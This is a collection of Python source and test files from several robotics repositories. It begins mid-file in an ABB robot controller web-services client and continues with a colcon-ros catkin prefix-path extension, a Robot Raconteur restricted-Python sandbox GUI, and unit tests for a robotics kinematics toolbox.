payload={"regain": "continue", "execmode": "continue" , "cycle": cycle, "condition": "none", "stopatbp": "disabled", "alltaskbytsp": "true"}
res=self._do_post("rw/rapid/execution?action=start", payload)
def activate_task(self, task):
payload={}
self._do_post(f"rw/rapid/tasks/{task}?action=activate",payload)
def deactivate_task(self, task):
payload={}
self._do_post(f"rw/rapid/tasks/{task}?action=deactivate",payload)
def stop(self):
payload={"stopmode": "stop"}
res=self._do_post("rw/rapid/execution?action=stop", payload)
def resetpp(self):
res=self._do_post("rw/rapid/execution?action=resetpp")
def get_execution_state(self):
soup = self._do_get("rw/rapid/execution")
ctrlexecstate=soup.find('span', attrs={'class': 'ctrlexecstate'}).text
cycle=soup.find('span', attrs={'class': 'cycle'}).text
return RAPIDExecutionState(ctrlexecstate, cycle)
def get_controller_state(self):
soup = self._do_get("rw/panel/ctrlstate")
return soup.find('span', attrs={'class': 'ctrlstate'}).text
def get_operation_mode(self):
soup = self._do_get("rw/panel/opmode")
return soup.find('span', attrs={'class': 'opmode'}).text
def get_digital_io(self, signal, network='Local', unit='DRV_1'):
soup = self._do_get("rw/iosystem/signals/" + network + "/" + unit + "/" + signal)
state = soup.find('span', attrs={'class': 'lvalue'}).text
return int(state)
def set_digital_io(self, signal, value, network='Local', unit='DRV_1'):
lvalue = '1' if bool(value) else '0'
payload={'lvalue': lvalue}
res=self._do_post("rw/iosystem/signals/" + network + "/" + unit + "/" + signal + "?action=set", payload)
def get_rapid_variable(self, var):
soup = self._do_get("rw/rapid/symbol/data/RAPID/T_ROB1/" + var)
state = soup.find('span', attrs={'class': 'value'}).text
return state
def set_rapid_variable(self, var, value):
payload={'value': value}
res=self._do_post("rw/rapid/symbol/data/RAPID/T_ROB1/" + var + "?action=set", payload)
def read_file(self, filename):
url="/".join([self.base_url, "fileservice", filename])
res=self._session.get(url, auth=self.auth)
try:
return res.content
finally:
res.close()
def upload_file(self, filename, contents):
url="/".join([self.base_url, "fileservice" , filename])
res=self._session.put(url, contents, auth=self.auth)
assert res.ok, res.reason
res.close()
def delete_file(self, filename):
url="/".join([self.base_url, "fileservice" , filename])
res=self._session.delete(url, auth=self.auth)
res.close()
def read_event_log(self, elog=0):
o=[]
soup = self._do_get("rw/elog/" + str(elog) + "/?lang=en")
state=soup.find('div', attrs={'class': 'state'})
ul=state.find('ul')
for li in ul.findAll('li'):
seqnum = int(li.attrs["title"].split("/")[-1])
def find_val(v):
return li.find('span', attrs={'class': v}).text
msg_type=int(find_val('msgtype'))
code=int(find_val('code'))
tstamp=datetime.datetime.strptime(find_val('tstamp'), '%Y-%m-%d T %H:%M:%S')
title=find_val('title')
desc=find_val('desc')
conseqs=find_val('conseqs')
causes=find_val('causes')
actions=find_val('actions')
args=[]
nargs=int(find_val('argc'))
for i in range(nargs):
arg=find_val('arg%d' % (i+1))
args.append(arg)
o.append(RAPIDEventLogEntry(seqnum,msg_type,code,tstamp,args,title,desc,conseqs,causes,actions))
return o
def get_tasks(self):
o = {}
soup = self._do_get("rw/rapid/tasks")
state=soup.find('div', attrs={'class': 'state'})
ul=state.find('ul')
for li in ul.findAll('li'):
def find_val(v):
return li.find('span', attrs={'class': v}).text
name=find_val('name')
type_=find_val('type')
taskstate=find_val('taskstate')
excstate=find_val('excstate')
active=find_val('active') == "On"
motiontask=find_val("motiontask").lower() == "true"
o[name]=RAPIDTaskState(name,type_,taskstate,excstate,active,motiontask)
return o
def execute_motion_program(self, motion_program: MotionProgram, task="T_ROB1"):
b = motion_program.get_program_bytes()
assert len(b) > 0, "Motion program must not be empty"
filename = "$temp/motion_program.bin"
if task != "T_ROB1":
task_m = re.match(r"^.*[A-Za-z_](\d+)$",task)
if task_m:
filename_ind = int(task_m.group(1))
filename = f"$temp/motion_program{filename_ind}.bin"
def _upload():
self.upload_file(filename, b)
return self._execute_motion_program([task],_upload)
def execute_multimove_motion_program(self, motion_programs: List[MotionProgram], tasks=None):
if tasks is None:
tasks = [f"T_ROB{i+1}" for i in range(len(motion_programs))]
assert len(motion_programs) == len(tasks), \
"Motion program list and task list must have some length"
assert len(tasks) > 1, "Multimove program must have at least two tasks"
b = []
for mp in motion_programs:
b.append(mp.get_program_bytes())
assert len(b) > 0, "Motion program must not be empty"
filenames = []
for task in tasks:
filename = "$temp/motion_program.bin"
if task != "T_ROB1":
task_m = re.match(r"^.*[A-Za-z_](\d+)$",task)
if task_m:
filename_ind = int(task_m.group(1))
filename = f"$temp/motion_program{filename_ind}.bin"
filenames.append(filename)
assert len(filenames) == len(b)
def _upload():
for i in range(len(filenames)):
self.upload_file(filenames[i], b[i])
return self._execute_motion_program(tasks,_upload)
def _execute_motion_program(self, tasks, upload_fn: Callable[[],None]):
exec_state = self.get_execution_state()
assert exec_state.ctrlexecstate == "stopped"
#assert exec_state.cycle == "once"
ctrl_state = self.get_controller_state()
assert ctrl_state == "motoron"
log_before = self.read_event_log()
prev_seqnum = log_before[0].seqnum
self.resetpp()
upload_fn()
self.start(cycle='once',tasks=tasks)
while True:
exec_state = self.get_execution_state()
if exec_state.ctrlexecstate != "running":
break
time.sleep(0.05)
log_after_raw = self.read_event_log()
log_after = []
for l in log_after_raw:
if l.seqnum > prev_seqnum:
log_after.append(l)
elif prev_seqnum > 61440 and l.seqnum < 4096:
# Handle uint16 wraparound
log_after.append(l)
else:
break
failed = False
for l in log_after:
if l.msgtype >= 2:
if len(l.args) > 0 and l.args[0].lower() == "motion program failed":
assert False, l.args[1] + " " + l.args[2] + " " + l.args[3] + " " + l.args[4]
if l.msgtype >= 3:
failed = True
if failed:
assert False, "Motion Program Failed, see robot error log for details"
found_log_open = False
found_log_close = False
log_filename = ""
for l in log_after:
if l.code == 80003:
if l.args[0].lower() == "motion program log file closed":
assert not found_log_close, "Found more than one log closed message"
found_log_close = True
if l.args[0].lower() == "motion program log file opened":
assert not found_log_open, "Found more than one log opened message"
found_log_open = True
log_filename_m = re.search(r"(log\-[\d\-]+\.csv)",l.args[1])
assert log_filename_m, "Invalid log opened message"
log_filename = log_filename_m.group(1)
assert found_log_open and found_log_close and len(log_filename) > 0, "Could not find log file messages in robot event log"
log_contents = self.read_file(f"$temp/{log_filename}")
try:
self.delete_file(f"$temp/{log_filename}")
except:
pass
return log_contents
class ABBException(Exception):
def __init__(self, message, code):
super(ABBException, self).__init__(message)
self.code=code
class RAPIDExecutionState(NamedTuple):
ctrlexecstate: Any
cycle: Any
class RAPIDEventLogEntry(NamedTuple):
seqnum: int
msgtype: int
code: int
tstamp: datetime.datetime
args: List[Any]
title: str
desc: str
conseqs: str
causes: str
actions: str
class RAPIDTaskState(NamedTuple):
name: str
type_: str
taskstate: str
excstate: str
active: bool
motiontask: bool
def main():
j1 = jointtarget([10,20,30,40,50,60],[0]*6)
j2 = jointtarget([90,-91,60,-93,94,-95],[0]*6)
j3 = jointtarget([-80,81,-82,83,-84,85],[0]*6)
mp = MotionProgram()
mp.MoveAbsJ(j1,v1000,fine)
mp.MoveAbsJ(j2,v5000,fine)
mp.MoveAbsJ(j3,v500,fine)
mp.MoveAbsJ(j2,v5000,z50)
mp.MoveAbsJ(j3,v500,z200)
mp.MoveAbsJ(j2,v5000,fine)
mp.WaitTime(1)
r1 = robtarget([0.1649235*1e3, 0.1169957*1e3, 0.9502961*1e3], [ 0.6776466, -0.09003431, 0.6362069, 0.3576725 ], confdata(0,0,0,0),[0]*6)
r2 = robtarget([ 0.6243948*1e3, -0.479558*1e3 , 0.7073749*1e3], [ 0.6065634, -0.2193409, 0.6427138, -0.4133877], confdata(-1,-1,0,1),[0]*6)
r3 = robtarget([417.9236, 276.9956, 885.2959], [ 0.8909725 , -0.1745558 , 0.08864544, 0.4096832 ], confdata( 0., 1., -2., 0.),[0]*6)
r4 = robtarget([417.9235 , -11.00438, 759.2958 ], [0.7161292 , 0.1868255 , 0.01720813, 0.6722789 ], confdata( 0., 2., -2., 0.),[0]*6)
r5 = robtarget([ 417.9235, -173.0044, 876.2958], [0.6757616, 0.3854275, 0.2376617, 0.5816431], confdata(-1., 1., -1., 0.),[0]*6)
mp.MoveJ(r1,v500,fine)
mp.MoveJ(r2,v400,fine)
mp.MoveJ(r1,v500,z100)
mp.MoveJ(r2,v400,z100)
mp.MoveJ(r1,v500,fine)
mp.WaitTime(1.5)
mp.MoveJ(r3,v5000,fine)
mp.MoveL(r4,v200,fine)
mp.MoveL(r3,v200,fine)
mp.MoveL(r4,v1000,z100)
mp.MoveL(r3,v1000,z100)
mp.MoveL(r4,v1000,fine)
mp.WaitTime(2.5)
mp.MoveJ(r3,v5000,fine)
mp.MoveC(r4,r5,v200,z10)
mp.MoveC(r4,r3,v50,fine)
print(mp.get_program_rapid())
client = MotionProgramExecClient()
log_results = client.execute_motion_program(mp)
# Write log csv to file
# with open("log.csv","wb") as f:
# f.write(log_results)
# Or convert to string and use in memory
log_results_str = log_results.decode('ascii')
print(log_results_str)
if __name__ == "__main__":
main()
``` |
{
"source": "johnwason/colcon-ros",
"score": 2
} |
#### File: colcon_ros/prefix_path/catkin.py
```python
import os
from colcon_core.logging import colcon_logger
from colcon_core.plugin_system import satisfies_version
from colcon_core.prefix_path import PrefixPathExtensionPoint
logger = colcon_logger.getChild(__name__)
_get_cmake_prefix_path_warnings = set()
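# Illustrative value of the environment variable this extension inspects (paths are made up):
#   CMAKE_PREFIX_PATH=/opt/ros/noetic:/home/user/ws/install_isolated/pkg_a
# Only entries containing a '.catkin' marker file are considered; the set above caches paths that have
# already produced a warning so each one is only reported once per process.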
class CmakePrefixPath(PrefixPathExtensionPoint):
"""
Prefix path defined in the `CMAKE_PREFIX_PATH` environment variable.
The path must contain a `.catkin` file to be considered.
"""
# the priority needs to be lower than the ament prefix path extension
PRIORITY = 80
def __init__(self): # noqa: D107
super().__init__()
satisfies_version(
PrefixPathExtensionPoint.EXTENSION_POINT_VERSION, '^1.0')
def extend_prefix_path(self, paths): # noqa: D102
global _get_cmake_prefix_path_warnings
cmake_prefix_path = os.environ.get('CMAKE_PREFIX_PATH', '')
for path in cmake_prefix_path.split(os.pathsep):
if not path:
continue
if not os.path.exists(path):
if path not in _get_cmake_prefix_path_warnings:
logger.warning(
"The path '{path}' in the environment variable "
"CMAKE_PREFIX_PATH doesn't exist"
.format_map(locals()))
_get_cmake_prefix_path_warnings.add(path)
continue
if not os.path.exists(os.path.join(path, '.catkin')):
continue
for filename in os.listdir(path):
if filename.startswith('local_setup.'):
break
else:
parent_path = os.path.dirname(path)
marker_file = os.path.join(
parent_path, '.colcon_install_layout')
if not os.path.exists(marker_file):
if path not in _get_cmake_prefix_path_warnings:
logger.warning(
"The path '{path}' in the environment variable "
'CMAKE_PREFIX_PATH seems to be a catkin workspace '
"but it doesn't contain any 'local_setup.*' files."
' Maybe the catkin version is not up-to-date?'
.format_map(locals()))
_get_cmake_prefix_path_warnings.add(path)
continue
with open(marker_file, 'r') as h:
install_layout = h.read().rstrip()
if install_layout != 'isolated':
if path not in _get_cmake_prefix_path_warnings:
logger.warning(
"The path '{path}' in the environment variable "
"CMAKE_PREFIX_PATH doesn't use the expected "
"install layout 'isolated'.".format_map(locals()))
_get_cmake_prefix_path_warnings.add(path)
continue
path = parent_path
paths.append(path)
``` |
{
"source": "johnwason/restricted_python_robotraconteur_service",
"score": 2
} |
#### File: johnwason/restricted_python_robotraconteur_service/restricted_python_robotraconteur_service_gui.py
```python
from RobotRaconteur.Client import *
from js import document
from js import print_div
from js import ace
import traceback
def on_run_button_click(a):
function_name = document.getElementById("function_textbox").value
editor = ace.edit("editor")
script_src = editor.getValue()
print_div("Running function_named: " + function_name)
loop.call_soon(do_click(script_src,function_name))
async def do_click(script_src,function_name):
try:
await client.async_run_sandbox(script_src,function_name,None,None)
except Exception as e:
print_div(traceback.format_exc())
async def main():
global client
client = await RRN.AsyncConnectService("rr+ws://localhost:62354/?service=RestrictedPythonService",None,None,None,None)
run_button = document.getElementById("run_button")
run_button.onclick = on_run_button_click
loop = RR.WebLoop()
loop.call_soon(main())
```
#### File: restricted_python_robotraconteur_service/test/test_restricted_python_service_object.py
```python
import os,sys,inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
import restricted_python_robotraconteur_service as res
c = res.RestrictedPythonService()
test_src = """
def hello():
print("Hello world!")
def hello_name(name):
print("Hello " + name)
"""
c.run_sandbox(test_src, "hello", None)
``` |
{
"source": "johnwason/rpi_general_robotics_toolbox_py",
"score": 2
} |
#### File: rpi_general_robotics_toolbox_py/test/test_general_robotics_toolbox.py
```python
import general_robotics_toolbox as rox
import numpy as np
import pytest
import sys
if (sys.version_info > (3, 0)):
xrange = range
#Numeric precision reduced for literals
eps = 1e-6 #np.finfo(np.float64).eps
#inches to meters conversion factor
#(use Pint package for any real programs)
in_2_m = 0.0254
def test_hat():
k=[1,2,3]
k_hat=rox.hat(k)
k_hat_t=np.array([[0, -3, 2], [3, 0, -1], [-2, 1,0]])
np.testing.assert_allclose(k_hat, k_hat_t)
def _rot_test(k, theta, rot_t):
rot=rox.rot(k, theta)
np.testing.assert_allclose(rot, rot_t, atol=1e-5)
def test_rot():
rot_1_t=np.array([[1,0,0], [0,0,1], [0,-1,0]]).T
_rot_test(np.array([1,0,0]), np.pi/2.0, rot_1_t)
rot_2_t=np.array([[0,0,-1], [0,1,0], [1,0,0]]).T
_rot_test(np.array([0,1,0]), np.pi/2.0, rot_2_t)
rot_3_t=np.array([[0,1,0], [-1,0,0], [0,0,1]]).T
_rot_test(np.array([0,0,1]), np.pi/2.0, rot_3_t)
#Random rotation
rot_4=np.array([[-0.5057639, -0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
_rot_test(np.array([0.4490221,0.30207945,0.84090853]), 2.65949884, rot_4)
def _R2rot_test(k1, theta1):
R = rox.rot(k1,theta1)
k2, theta2 = rox.R2rot(R)
if abs(theta1-theta2) > (theta1 + theta2):
k2 = -k2
theta2 = -theta2
np.testing.assert_allclose(theta1,theta2, atol=1e-6)
if (abs(theta1) < 1e-9):
return
if ((np.abs(theta1) - np.pi) < 1e-9):
if np.linalg.norm(k1+k2) < 1e-6:
np.testing.assert_allclose(k1,-k2, atol=1e-6)
return
np.testing.assert_allclose(k1,k2, atol=1e-6)
return
np.testing.assert_allclose(k1,k2, atol=1e-6)
def test_R2rot():
_R2rot_test(np.array([1,0,0]), np.pi/2.0)
_R2rot_test(np.array([0,1,0]), np.pi/2.0)
_R2rot_test(np.array([0,0,1]), np.pi/2.0)
_R2rot_test(np.array([0.4490221,0.30207945,0.84090853]), 2.65949884)
#Singularities
_R2rot_test([1,2,3]/np.linalg.norm([1,2,3]), 1e-10)
_R2rot_test([2,-1,3]/np.linalg.norm([2,-1,3]), np.pi + 1e-10)
_R2rot_test([-2,-1,3]/np.linalg.norm([-2,-1,3]), np.pi + 1e-10)
_R2rot_test([2,-1,-3]/np.linalg.norm([2,-1,-3]), np.pi + 1e-10)
_R2rot_test([0,-1,-3]/np.linalg.norm([0,-1,-3]), np.pi + 1e-10)
_R2rot_test([0,0,1], np.pi + 1e-10)
def test_screwmatrix():
k=[1, 2, 3]
G=rox.screw_matrix(k)
G_t=np.array([[ 1, 0, 0, 0, -3, 2], \
[ 0, 1, 0, 3, 0, -1], \
[ 0, 0, 1, -2, 1, 0], \
[ 0, 0, 0, 1, 0, 0], \
[ 0, 0, 0, 0, 1, 0], \
[ 0, 0, 0, 0, 0, 1,]])
np.testing.assert_allclose(G, G_t)
def test_R2q():
rot=np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
q_t=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
q=rox.R2q(rot)
np.testing.assert_allclose(q_t, q, atol=1e-6)
def test_q2R():
rot_t=np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
q=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
rot=rox.q2R(q)
np.testing.assert_allclose(rot, rot_t, atol=1e-6)
def test_rot2q():
k, theta=rox.R2rot(np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]]))
q_t=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
q=rox.rot2q(k,theta)
np.testing.assert_allclose(q_t, q, atol=1e-6)
def test_q2rot():
rot_t=np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
q=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
k, theta=rox.q2rot(q)
np.testing.assert_allclose(rox.rot(k, theta), rot_t, atol=1e-6)
def test_quatcomplement():
q=np.array([[ 0.2387194, 0.4360402, 0.2933459, 0.8165967]]).T
q_c=rox.quatcomplement(q)
np.testing.assert_allclose(q[0], q_c[0])
np.testing.assert_allclose(q[1:3], -q_c[1:3])
def test_quatproduct():
q_1=np.array([0.63867877, 0.52251797, 0.56156573, 0.06089615])
q_2=np.array([0.35764716, 0.61051424, 0.11540801, 0.69716703])
R_t=rox.q2R(q_1).dot(rox.q2R(q_2))
q_t=rox.R2q(R_t)
q = rox.quatproduct(q_1).dot(q_2).reshape((4,))
np.testing.assert_allclose(q, q_t, atol=1e-6)
def test_quatjacobian():
#TODO: test against better control case
q=np.array([0.63867877, 0.52251797, 0.56156573, 0.06089615])
J=rox.quatjacobian(q)
J_t=np.array([[-0.26125898, -0.28078286, -0.03044808], \
[ 0.31933938, 0.03044808, -0.28078286], \
[-0.03044808, 0.31933938, 0.26125898], \
[ 0.28078286, -0.26125898, 0.31933938]])
np.testing.assert_allclose(J, J_t, atol=1e-6)
def test_rpy2R():
rpy1=np.deg2rad([10,-30,90])
R1=rox.rpy2R(rpy1)
R1_t=np.array([[-0.0000000, -0.9848077, 0.1736482], \
[0.8660254, -0.0868241, -0.4924039], \
[0.5000000, 0.1503837, 0.8528686 ]])
np.testing.assert_allclose(R1, R1_t, atol=1e-6)
rpy2=rox.R2rpy(R1)
np.testing.assert_allclose(rpy1,rpy2, atol=1e-6)
#Check singularity
rpy3=np.deg2rad([10,90,-30])
R3=rox.rpy2R(rpy3)
with pytest.raises(Exception):
rox.R2rpy(R3)
def test_fwdkin():
#TODO: other joint types
#Home configuration (See Page 2-2 of Puma 260 manual)
puma=puma260b_robot()
pose=rox.fwdkin(puma, np.zeros(6))
np.testing.assert_allclose(pose.R, np.identity(3))
np.testing.assert_allclose(pose.p, np.array([10,-4.9,4.25])*in_2_m, atol=1e-6)
#Another right-angle configuration
joints2=np.array([180,-90,-90, 90, 90, 90])*np.pi/180.0
pose2=rox.fwdkin(puma, joints2)
np.testing.assert_allclose(pose2.R, rox.rot([0,0,1],np.pi).dot(rox.rot([0,1,0], -np.pi/2)), atol=1e-6)
np.testing.assert_allclose(pose2.p, np.array([-0.75, 4.9, 31])*in_2_m)
#Random configuration
joints3=np.array([50, -105, 31, 4, 126, -184])*np.pi/180
pose3=rox.fwdkin(puma,joints3)
pose3_R_t=np.array([[0.4274, 0.8069, -0.4076],\
[0.4455, -0.5804,-0.6817], \
[-0.7866, 0.1097, -0.6076]])
pose3_p_t=[0.2236, 0.0693, 0.4265]
np.testing.assert_allclose(pose3.R, pose3_R_t, atol=1e-4)
np.testing.assert_allclose(pose3.p, pose3_p_t, atol=1e-4)
puma_tool=puma260b_robot_tool()
pose4=rox.fwdkin(puma_tool, joints3)
pose4_R_t=np.array([[0.4076, 0.8069, 0.4274],\
[0.6817, -0.5804,0.4455], \
[0.6076, 0.1097, -0.7866]])
pose4_p_t=[0.2450, 0.0916, 0.3872]
np.testing.assert_allclose(pose4.R, pose4_R_t, atol=1e-4)
np.testing.assert_allclose(pose4.p, pose4_p_t, atol=1e-4)
def test_robotjacobian():
#Home configuration (See Page 2-2 of Puma 260 manual)
puma=puma260b_robot()
J=rox.robotjacobian(puma, np.zeros(6))
np.testing.assert_allclose(J[0:3,:], puma.H, atol=1e-4)
J_t_v=np.array([[4.9,10,0],[-8.75,0,-10],[-8,0,-2.2], \
[0,2.2,0],[0,0,-2.2],[0,0,0]]).T*in_2_m
np.testing.assert_allclose(J[3:6,:], J_t_v, atol=1e-4)
#Another right-angle configuration
joints2=np.array([180,-90,-90, 90, 90, 90])*np.pi/180.0
J2=rox.robotjacobian(puma, joints2)
J2_t=np.array([[0,0,0,0,-1,0], \
[0,-1,-1,0,0,0], \
[1,0,0,-1,-0,1], \
[-0.1245,-0.4572,-0.2591,0,0,0], \
[-0.0191,0,0,0,0.0559,0], \
[0,-0.0191,0,0,0,0,]])
np.testing.assert_allclose(J2, J2_t, atol=1e-4)
#Random configuration
joints3=np.array([50, -105, 31, 4, 126, -184])*np.pi/180
J3=rox.robotjacobian(puma, joints3)
J3_t=np.array([[0, -0.766, -0.766,-0.6179, -0.7765, 0.4274], \
[0, 0.6428, 0.6428, -0.7364, 0.6265, 0.4456], \
[1, 0, 0, 0.2756, -0.0671, -0.7866], \
[-0.0693, 0.0619, -0.0643, 0.0255, -0.0259, 0], \
[0.2236, 0.0738, -0.0766, -0.0206, -0.0357, 0], \
[0, -0.1969, -0.2298, 0.0022, -0.0343, 0]])
np.testing.assert_allclose(J3, J3_t, atol=1e-4)
def test_subproblems():
x=[1,0,0]
y=[0,1,0]
z=[0,0,1]
#subproblem0
assert(rox.subproblem0(x,y,z) == np.pi/2)
#subproblem1
k1=(np.add(x,z))/np.linalg.norm(np.add(x,z))
k2=(np.add(y,z))/np.linalg.norm(np.add(y,z))
assert(rox.subproblem1(k1, k2, z) == np.pi/2)
#subproblem2
p2=x
q2=np.add(x, np.add(y,z))
q2=q2/np.linalg.norm(q2)
a2 = rox.subproblem2(p2, q2, z, y)
assert len(a2) == 2
r1=rox.rot(z,a2[0][0]).dot(rox.rot(y,a2[0][1]))[:,0]
r2=rox.rot(z,a2[1][0]).dot(rox.rot(y,a2[1][1]))[:,0]
np.testing.assert_allclose(r1, q2, atol=1e-4)
np.testing.assert_allclose(r2, q2, atol=1e-4)
a3 = rox.subproblem2(x, z, z, y)
assert len(a3) == 1
r3=rox.rot(z,a3[0][0]).dot(rox.rot(y,a3[0][1]))[:,0]
np.testing.assert_allclose(r3, z, atol=1e-4)
#subproblem3
p4=[.5, 0, 0]
q4=[0, .75, 0]
a4=rox.subproblem3(p4, q4, z, .5)
a5=rox.subproblem3(p4, q4, z, 1.25)
assert len(a4) == 2
np.testing.assert_allclose(np.linalg.norm(np.add(q4, rox.rot(z, a4[0]).dot(p4))),0.5)
np.testing.assert_allclose(np.linalg.norm(np.add(q4, rox.rot(z, a4[1]).dot(p4))),0.5)
assert len(a5) == 1
np.testing.assert_allclose(np.linalg.norm(np.add(q4, rox.rot(z, a5[0]).dot(p4))),1.25)
#subproblem4
p6=y
q6=[.8, .2, .5]
d6=.3
a6=rox.subproblem4(p6, q6, z, d6)
np.testing.assert_allclose(np.dot(p6, rox.rot(z,a6[0]).dot(q6)), d6, atol=1e-4)
np.testing.assert_allclose(np.dot(p6, rox.rot(z,a6[1]).dot(q6)), d6, atol=1e-4)
def test_robot6_sphericalwrist_invkin():
robot1=puma260b_robot()
robot2=abb_irb6640_180_255_robot()
robot3=puma260b_robot_tool()
def _test_configuration(robot, theta):
pose_1 = rox.fwdkin(robot, theta)
theta2 = rox.robot6_sphericalwrist_invkin(robot, pose_1)
if not len(theta2) > 0:
return False
for theta2_i in theta2:
pose_2 = rox.fwdkin(robot, theta2_i)
if not pose_1 == pose_2:
return False
return True
def _test_last_configuration(robot, theta, last_theta):
pose_1 = rox.fwdkin(robot, theta)
theta2 = rox.robot6_sphericalwrist_invkin(robot, pose_1, last_theta)
pose_2 = rox.fwdkin(robot, theta2[0])
if not pose_1 == pose_2:
return False
if not np.allclose(theta2[0], last_theta, atol=np.deg2rad(10)):
return False
return True
assert _test_configuration(robot1, np.zeros(6))
#Previous failed value, add to unit test
assert _test_configuration(robot2, [-0.09550528, -0.43532822, -2.35369965, -2.42324955, -1.83659391, -4.00786639])
for robot in (robot1,robot2,robot3):
for _ in xrange(100):
theta = np.random.rand(6)*(robot.joint_upper_limit - robot.joint_lower_limit) \
+ robot.joint_lower_limit
assert _test_configuration(robot, theta)
theta_test1 = np.zeros(6)
assert _test_last_configuration(robot1, theta_test1, theta_test1 + np.deg2rad(4))
assert _test_last_configuration(robot2, theta_test1 - np.deg2rad(4), np.array([0,0,0,0,0,np.pi*2]))
for robot in (robot1,robot2,robot3):
for _ in xrange(100):
theta = np.random.rand(6)*(robot.joint_upper_limit - robot.joint_lower_limit - np.deg2rad(30)) \
+ robot.joint_lower_limit + np.deg2rad(15)
last_theta = theta + (np.random.rand(6)-0.5)*2*np.deg2rad(4)
assert _test_last_configuration(robot, theta, last_theta)
def puma260b_robot():
"""Returns an approximate Robot instance for a Puma 260B robot"""
x=np.array([1,0,0])
y=np.array([0,1,0])
z=np.array([0,0,1])
a=np.array([0,0,0])
H = np.array([z,y,y,z,y,x]).T
P = np.array([13*z, a, (-4.9*y + 7.8*x -0.75*z), -8.0*z, a, a, 2.2*x]).T*in_2_m
joint_type=[0,0,0,0,0,0]
joint_min=np.deg2rad(np.array([-5, -256, -214, -384, -32, -267]))
joint_max=np.deg2rad(np.array([313, 76, 34, 194, 212, 267]))
return rox.Robot(H, P, joint_type, joint_min, joint_max)
def puma260b_robot_tool():
robot=puma260b_robot()
robot.R_tool=rox.rot([0,1,0], np.pi/2.0)
robot.p_tool=[0.05, 0, 0]
return robot
def abb_irb6640_180_255_robot():
"""Return a Robot instance for the ABB IRB6640 180-255 robot"""
x=np.array([1,0,0])
y=np.array([0,1,0])
z=np.array([0,0,1])
a=np.array([0,0,0])
H = np.array([z,y,y,x,y,x]).T
P = np.array([0.78*z, 0.32*x, 1.075*z, 0.2*z, 1.142*x, 0.2*x, a]).T
joint_type=[0,0,0,0,0,0]
joint_min=np.deg2rad(np.array([-170, -65, -180, -300, -120, -360]))
joint_max=np.deg2rad(np.array([170, 85, 70, 300, 120, 360]))
p_tool=np.array([0,0,0])
R_tool=rox.rot([0,1,0], np.pi/2.0)
return rox.Robot(H, P, joint_type, joint_min, joint_max, R_tool=R_tool, p_tool=p_tool)
```
#### File: rpi_general_robotics_toolbox_py/test/test_ros_tf.py
```python
import general_robotics_toolbox as rox
import numpy as np
import pytest
rospy = pytest.importorskip('rospy')
import general_robotics_toolbox.ros_tf as rox_tf
import general_robotics_toolbox.ros_msg as rox_msg
#Numeric precision reduced for literals
eps = 1e-6 #np.finfo(np.float64).eps
def test_ros_tf_listener():
l=rox_tf.TransformListener()
rox_tf1=rox.random_transform()
rox_tf1.parent_frame_id='world'
rox_tf1.child_frame_id='link1'
rox_tf2=rox.random_transform()
rox_tf2.parent_frame_id='link1'
rox_tf2.child_frame_id='link2'
l.ros_listener.setTransform(rox_msg.transform2transform_stamped_msg(rox_tf1))
l.ros_listener.setTransform(rox_msg.transform2transform_stamped_msg(rox_tf2))
assert l.canTransform('world','link1')
assert l.canTransformFull('world', rospy.Time(0), 'link1', rospy.Time(0), 'world')
assert not l.canTransform('world','link3')
l.waitForTransform('world','link1',rospy.Time(0), rospy.Duration(5))
l.waitForTransformFull('world', rospy.Time(0), 'link1', rospy.Time(0), 'world', rospy.Duration(5))
l_tf1=l.lookupTransform('world','link1')
assert l_tf1 == rox_tf1
l_tf1_full=l.lookupTransformFull('world', rospy.Time(0), 'link1', rospy.Time(0), 'world')
assert l_tf1_full == rox_tf1
l_tf1_2=l.lookupTransform('world','link2')
assert l_tf1_2 == rox_tf1*rox_tf2
```
#### File: rpi_general_robotics_toolbox_py/test/test_urdf_loader.py
```python
import general_robotics_toolbox as rox
import numpy as np
import pytest
xacro = pytest.importorskip("xacro")
rospkg = pytest.importorskip("rospkg")
from general_robotics_toolbox import urdf
def test_irb6640():
robot = urdf.robot_from_xacro_file("test/irb6640_180_255_nogeom.xacro", "rpi_general_robotics_toolbox_py")
_assert_robot(robot)
robot2 = urdf.robot_from_xml_file("test/irb6640_180_255_nogeom.urdf", "rpi_general_robotics_toolbox_py")
_assert_robot(robot2)
robot3 = urdf.robot_from_xml_file("test/irb6640_180_255_nogeom_twist.urdf", "rpi_general_robotics_toolbox_py")
_assert_robot(robot3)
def _assert_robot(robot):
np.testing.assert_allclose(robot.H, np.array([[0.,0.,0.,1.,0.,1.],[0.,1.,1.,0.,1.,0.],[1.,0.,0.,0.,0.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.P, np.array([[0.,0.32,0.,0.,1.142,0.2,0.],[0.,0.,0.,0.,0.,0.,0.],[0.78,0.,1.075,0.2,0.,0.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.joint_type, np.array([0.,0.,0.,0.,0.,0.]), atol=1e-4)
np.testing.assert_allclose(robot.joint_lower_limit, np.array([-2.967,-1.134,-3.142,-5.236,-2.094,-6.283]), atol=1e-4)
np.testing.assert_allclose(robot.joint_upper_limit, np.array([2.967,1.4855,1.222,5.236,2.094,6.283]), atol=1e-4)
np.testing.assert_allclose(robot.joint_vel_limit, np.array([1.7453,1.5707,1.5707,2.9671,2.4435,3.3161]), atol=1e-4)
np.testing.assert_allclose(robot.R_tool, np.array([[0,0,1], [0,1,0], [-1,0,0]]), atol=1e-4)
np.testing.assert_allclose(robot.p_tool, [0,0,0], atol=1e-4)
def test_sda10f():
with pytest.raises(AssertionError):
urdf.robot_from_xml_file("test/sda10f_nogeom.urdf", "rpi_general_robotics_toolbox_py")
